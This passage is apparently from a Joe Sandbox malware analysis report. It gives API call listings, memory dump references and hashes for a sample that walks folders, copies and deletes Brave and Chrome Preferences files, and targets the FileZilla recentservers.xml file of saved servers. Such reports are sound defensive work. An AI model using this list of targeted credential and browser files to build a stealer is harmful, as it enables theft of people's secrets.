                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1D51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1D7D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1DE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1DEB
                          • lstrlen.KERNEL32(00801794), ref: 007D1DF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1E19
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1E25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1E4B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1E56
                          • lstrlen.KERNEL32(00801794), ref: 007D1E61
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1E81
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1E8D
                          • lstrlen.KERNEL32(?), ref: 007D1E9A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1EBA
                          • lstrcat.KERNEL32(00000000,?), ref: 007D1EC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1EF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1F3E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007D1F45
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D1F9F
                          • lstrlen.KERNEL32(01259298), ref: 007D1FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 007D1FE3
                          • lstrlen.KERNEL32(00801794), ref: 007D1FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D200E
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D2042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D204D
                          • lstrlen.KERNEL32(00801794), ref: 007D2058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D2075
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D2081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                          • String ID: \*.*
                          • API String ID: 4127656590-1173974218
                          • Opcode ID: 8bdb5bd21fbe825d0cdf9bf201bbf3f57075344a77788b6565616d8edc1ac806
                          • Instruction ID: 0ee147d4255c888d20c7bc65a45ee43c0893112de89e94c32d7fa5685450e3a6
                          • Opcode Fuzzy Hash: 8bdb5bd21fbe825d0cdf9bf201bbf3f57075344a77788b6565616d8edc1ac806
                          • Instruction Fuzzy Hash: 3C926371A1121AEBDB21EFA4DD88AAF77B9AF54700F444126F805A7352DB38DD07CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDBEF
                          • lstrlen.KERNEL32(00804CA8), ref: 007DDBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDC17
                          • lstrcat.KERNEL32(00000000,00804CA8), ref: 007DDC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDC4C
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDC8F
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007DDCD0
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007DDCF0
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007DDD0A
                          • lstrlen.KERNEL32(007FCFEC), ref: 007DDD1D
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDD7B
                          • lstrlen.KERNEL32(00801794), ref: 007DDD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDDA3
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDDAF
                          • lstrlen.KERNEL32(?), ref: 007DDDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 007DDDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDE19
                          • lstrlen.KERNEL32(00801794), ref: 007DDE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DDE6F
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDE7B
                          • lstrlen.KERNEL32(01258F98), ref: 007DDE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDEBB
                          • lstrlen.KERNEL32(00801794), ref: 007DDEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DDEE6
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDEF2
                          • lstrlen.KERNEL32(01259138), ref: 007DDF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDFA5
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDFB1
                          • lstrlen.KERNEL32(01258F98), ref: 007DDFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDFF4
                          • lstrlen.KERNEL32(00801794), ref: 007DDFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE022
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DE02E
                          • lstrlen.KERNEL32(01259138), ref: 007DE03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DE06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 007DE0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 007DE0E7
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DE11F
                          • lstrlen.KERNEL32(0125D580), ref: 007DE12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE155
                          • lstrcat.KERNEL32(00000000,?), ref: 007DE15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE19F
                          • lstrcat.KERNEL32(00000000), ref: 007DE1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 007DE1F9
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DE22F
                          • lstrlen.KERNEL32(01259298), ref: 007DE23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE261
                          • lstrcat.KERNEL32(00000000,01259298), ref: 007DE269
                          • lstrlen.KERNEL32(\Brave\Preferences), ref: 007DE274
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE29B
                          • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 007DE2A7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE2CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE30F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE349
                          • DeleteFileA.KERNEL32(?), ref: 007DE381
                          • StrCmpCA.SHLWAPI(?,0125D6B8), ref: 007DE3AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE3F4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE41C
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE445
                          • StrCmpCA.SHLWAPI(?,01259138), ref: 007DE468
                          • StrCmpCA.SHLWAPI(?,01258F98), ref: 007DE47D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE4D9
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007DE4E0
                          • StrCmpCA.SHLWAPI(?,0125D5B0), ref: 007DE58E
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DE5C4
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 007DE639
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE678
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE6A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE6C7
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE70E
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE737
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE75C
                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 007DE776
                          • DeleteFileA.KERNEL32(?), ref: 007DE7D2
                          • StrCmpCA.SHLWAPI(?,01259158), ref: 007DE7FC
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE88C
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE8B5
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE8EE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE916
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 2635522530-726946144
                          • Opcode ID: 9a656c82c20bc1138ccd42b15d177a0adcf9959f2b249f15b69e28070b5f6086
                          • Instruction ID: 74a4a6d6725a066278967717422b1b16038c955c75e8180b23cca9b9d7a8e4b2
                          • Opcode Fuzzy Hash: 9a656c82c20bc1138ccd42b15d177a0adcf9959f2b249f15b69e28070b5f6086
                          • Instruction Fuzzy Hash: 7B925371A1121ADBDB21EFB4DC89AAE77B9AF54300F044526F845A7352DB38EC47CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E18D2
                          • lstrlen.KERNEL32(\*.*), ref: 007E18DD
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E18FF
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 007E190B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1932
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007E1947
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007E1967
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007E1981
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E19BF
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E19F2
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E1A1A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E1A25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1A4C
                          • lstrlen.KERNEL32(00801794), ref: 007E1A5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1A80
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1AB4
                          • lstrlen.KERNEL32(?), ref: 007E1AC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1AE5
                          • lstrcat.KERNEL32(00000000,?), ref: 007E1AF3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1B19
                          • lstrlen.KERNEL32(01259148), ref: 007E1B2F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1B59
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E1B64
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1B8F
                          • lstrlen.KERNEL32(00801794), ref: 007E1BA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1BC3
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1BCF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1BF8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1C25
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E1C30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1C57
                          • lstrlen.KERNEL32(00801794), ref: 007E1C69
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1C8B
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1C97
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1CC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1CEF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E1CFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1D21
                          • lstrlen.KERNEL32(00801794), ref: 007E1D33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1D55
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1D61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1D8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1DB9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E1DC4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1DED
                          • lstrlen.KERNEL32(00801794), ref: 007E1E19
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1E36
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1E42
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1E68
                          • lstrlen.KERNEL32(0125D688), ref: 007E1E7E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1EB2
                          • lstrlen.KERNEL32(00801794), ref: 007E1EC6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1EE3
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1EEF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1F15
                          • lstrlen.KERNEL32(0125DE50), ref: 007E1F2B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1F5F
                          • lstrlen.KERNEL32(00801794), ref: 007E1F73
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1F90
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1F9C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1FC2
                          • lstrlen.KERNEL32(0124B860), ref: 007E1FD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E2000
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E200B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E2036
                          • lstrlen.KERNEL32(00801794), ref: 007E2048
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E2067
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E2073
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E2098
                          • lstrlen.KERNEL32(?), ref: 007E20AC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E20D0
                          • lstrcat.KERNEL32(00000000,?), ref: 007E20DE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E2103
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E213F
                          • lstrlen.KERNEL32(0125D580), ref: 007E214E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E2176
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E2181
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                          • String ID: \*.*
                          • API String ID: 712834838-1173974218
                          • Opcode ID: 4cfbba851ff4d110a4485f9dece853c60c8c96ebdd0e8f042621126756d90196
                          • Instruction ID: d9a9bb497868bd3c7037e892fbac739f1b21142aa9739badd915d331a107156a
                          • Opcode Fuzzy Hash: 4cfbba851ff4d110a4485f9dece853c60c8c96ebdd0e8f042621126756d90196
                          • Instruction Fuzzy Hash: B4626F31A1265A9BCB21EFA5CC4DAAF77B9AF58700F444125B805E7252DB3CDD07CBA0
                          APIs
                          • wsprintfA.USER32 ref: 007E392C
                          • FindFirstFileA.KERNEL32(?,?), ref: 007E3943
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007E396C
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007E3986
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E39BF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E39E7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E39F2
                          • lstrlen.KERNEL32(00801794), ref: 007E39FD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3A1A
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E3A26
                          • lstrlen.KERNEL32(?), ref: 007E3A33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3A53
                          • lstrcat.KERNEL32(00000000,?), ref: 007E3A61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3A8A
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E3ACE
                          • lstrlen.KERNEL32(?), ref: 007E3AD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3B05
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E3B10
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3B36
                          • lstrlen.KERNEL32(00801794), ref: 007E3B48
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3B6A
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E3B76
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3B9E
                          • lstrlen.KERNEL32(?), ref: 007E3BB2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3BD2
                          • lstrcat.KERNEL32(00000000,?), ref: 007E3BE0
                          • lstrlen.KERNEL32(01259298), ref: 007E3C0B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3C31
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E3C3C
                          • lstrlen.KERNEL32(01259148), ref: 007E3C5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3C84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E3C8F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3CB7
                          • lstrlen.KERNEL32(00801794), ref: 007E3CC9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3CE8
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E3CF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3D1A
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E3D47
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E3D52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3D79
                          • lstrlen.KERNEL32(00801794), ref: 007E3D8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3DAD
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E3DB9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3DE2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3E11
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E3E1C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3E43
                          • lstrlen.KERNEL32(00801794), ref: 007E3E55
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3E77
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E3E83
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3EAC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3EDB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E3EE6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3F0D
                          • lstrlen.KERNEL32(00801794), ref: 007E3F1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3F41
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E3F4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3F75
                          • lstrlen.KERNEL32(?), ref: 007E3F89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3FA9
                          • lstrcat.KERNEL32(00000000,?), ref: 007E3FB7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E3FE0
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E401F
                          • lstrlen.KERNEL32(0125D580), ref: 007E402E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4056
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E4061
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E408A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E40CE
                          • lstrcat.KERNEL32(00000000), ref: 007E40DB
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007E42D9
                          • FindClose.KERNEL32(00000000), ref: 007E42E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 1006159827-1013718255
                          • Opcode ID: 07f2d274eaaa0629ab151b67303cd97315b8758444fa14a8fe88ff7fe1ab389c
                          • Instruction ID: 85f373580350ecdaf103b3b5f5a0f1b8b8caee3872a2a775df12a4cd6ec947b3
                          • Opcode Fuzzy Hash: 07f2d274eaaa0629ab151b67303cd97315b8758444fa14a8fe88ff7fe1ab389c
                          • Instruction Fuzzy Hash: 0A62747191265ADBCB21EFA5DC4DAAE77B9AF58300F048125F815A7252DB3CED03CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6995
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 007E69C8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6A29
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E6A34
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6A5D
                          • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 007E6A77
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6A99
                          • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 007E6AA5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6AD0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E6B00
                          • LocalAlloc.KERNEL32(00000040,?), ref: 007E6B35
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6B9D
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E6BCD
                          Strings
                          Memory Dump Source
